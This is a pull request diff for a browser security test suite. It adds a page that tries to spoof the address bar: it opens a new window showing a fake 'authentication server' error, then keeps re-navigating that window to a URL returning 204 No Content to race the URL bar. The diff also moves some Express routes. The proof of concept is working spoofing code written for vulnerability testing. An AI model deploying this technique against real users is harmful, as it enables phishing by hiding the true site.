### PR TITLE
Add address bar spoofing test

### DIFF
--- a/security/address-bar-spoofing/index.html
+++ b/security/address-bar-spoofing/index.html
@@ -19,6 +19,7 @@
         <li><a href="/security/address-bar-spoofing/spoof-open-b64-html.html">Base64 HTML Loading Spoof</a></li>
         <li><a href="/security/address-bar-spoofing/spoof-unsupported-scheme.html">Unsupported URL Scheme Spoof</a></li>
         <li><a href="/security/address-bar-spoofing/js-page-rewrite.html">Long Loading Request Rewrite</a></li>
+        <li><a href="/security/address-bar-spoofing/spoof-new-window.html">New Window Rewrite</a></li>
     </ul>
   </body>
 </html>

--- a/security/address-bar-spoofing/server/routes.js
+++ b/security/address-bar-spoofing/server/routes.js
@@ -3,8 +3,13 @@ const router = express.Router();
 
 // Returns a 301 redirect to a download link of our browser
 // for use in the download path test
-router.get('/', (req, res) => {
+router.get('/download-redirect', (req, res) => {
     res.redirect(301, 'https://staticcdn.duckduckgo.com/macos-desktop-browser/duckduckgo.dmg');
+});
+
+// Returns a 204 no content 
+router.get('/no-content', (req, res) => {
+    res.status(204).send();
 });
 
 module.exports = router;

--- a/security/address-bar-spoofing/server/routes.js
+++ b/security/address-bar-spoofing/server/routes.js
@@ -7,7 +7,7 @@ router.get('/download-redirect', (req, res) => {
     res.redirect(301, 'https://staticcdn.duckduckgo.com/macos-desktop-browser/duckduckgo.dmg');
 });
 
-// Returns a 204 no content 
+// Returns a 204 no content
 router.get('/no-content', (req, res) => {
     res.status(204).send();
 });

--- a/security/address-bar-spoofing/spoof-new-window.html
+++ b/security/address-bar-spoofing/spoof-new-window.html
@@ -1,0 +1,45 @@
+<!DOCTYPE html>
+<html>
+
+<head>
+    <meta charset="utf-8">
+    <meta name="viewport" content="width=device-width">
+    <title>URL Spoofing - New Window Rewrite</title>
+    <script>
+        let w;
+        let t;
+        function newWindow() {
+            w = window.open("", "", "");
+            w.document.write(`<body onblur="document.body.innerHTML='<h2>Your address bar has been spoofed. This is not https://broken.third-party.site</h2>'"><h2>There was a problem communicating with drive authentication server, please switch to previous tabs. Do not close this window, closing this window will cancel current download.</h2></body>`);
+        }
+
+        function spoof() {
+            w.location.href = 'https://broken.third-party.site/';
+            var i = setInterval(function () {
+                try {
+                    w.location.href;
+                } catch (e) {
+                    w.location.href = 'https://broken.third-party.site/security/address-bar-spoofing/no-content';
+                    clearInterval(i);
+                }
+            }, 1);
+        }
+    </script>
+</head>
+
+<body>
+    <p><a href="./index.html">[Back]</a></p>
+
+    This test will try to confuse the browser to show the wrong domain in the URL bar by opening a new window
+    and then rewriting the location of the new window from the parent. The new window will show a message that 
+    the address bar has been spoofed. Tap "New Window", then return to this tab, and tap "Spoof" to see the
+    address bar change to "https://broken.third-party.site". If it doesn't show as such, the browser is not
+    vulnerable to this attack. Note: this won't work if run from broken.third-party.site. Ensure it is run from 
+    another origin such as https://privacy-test-pages.site.
+
+    
+    <button onclick="newWindow()">New Window</button>
+    <button onclick="spoof()">Spoof</button>
+</body>
+
+</html>

--- a/server.js
+++ b/server.js
@@ -255,12 +255,6 @@ app.get('/redirect', (req, res) => {
     res.end();
 });
 
-// Returns a 301 redirect to a download link of our browser
-// for use in the address bar spoofing test
-app.get('/security/address-bar-spoofing/download-redirect', (req, res) => {
-    res.redirect(301, 'https://staticcdn.duckduckgo.com/macos-desktop-browser/duckduckgo.dmg');
-});
-
 app.use('/content-scope-scripts/', express.static('node_modules/@duckduckgo/content-scope-scripts/integration-test/test-pages/'));
 
 const blockingRoutes = require('./privacy-protections/request-blocking/server/routes');


### PR DESCRIPTION
Asana: https://app.asana.com/0/1204023833050360/1208069944887776/f

This test creates a new window and tries to exploit a race condition in the address bar by navigating to a location that returns 204 no-content (which should not update the address bar, but occasionally does).